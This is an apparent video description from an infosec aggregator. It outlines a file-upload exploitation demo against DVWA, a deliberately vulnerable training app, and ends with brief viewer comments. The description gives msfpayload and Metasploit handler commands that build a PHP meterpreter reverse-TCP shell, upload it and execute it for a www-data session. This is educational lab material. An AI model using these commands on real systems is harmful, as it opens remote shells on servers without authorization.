Description: Good evening and welcome to my DVWA File Upload exploitation demonstration.
In this video I'll create a PHP payload with MsfPayload:
msfpayload php/meterpreter/reverse_tcp LHOST=10.50.60.161 LPORT=8080 R > connectback.php
Also, I'll edit the connectback.php script to remove the "safety latch" the # on line 1.
Then setup Metasploit to handle the reverse connection:
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.50.60.161
set LPORT 8080
exploit
I'll then use the Upload section of DVWA to upload the payload, check out the source and browse to the upload directory http: 10.50.60.193 dvwa hackable uploads and execute the connectback.php script.
This will give me a session on DVWA has www-data user (apache).
d3m0n35
Tags: DVWA , php , msfpayload , metasploit , meterpreter ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
nice video!
Thanks - didn't you create the DVWA?
I started and lead the project but a lot of people have contributed over the years.
Just wanted to say thanks to you and others, its taught me a great deal - so thanks.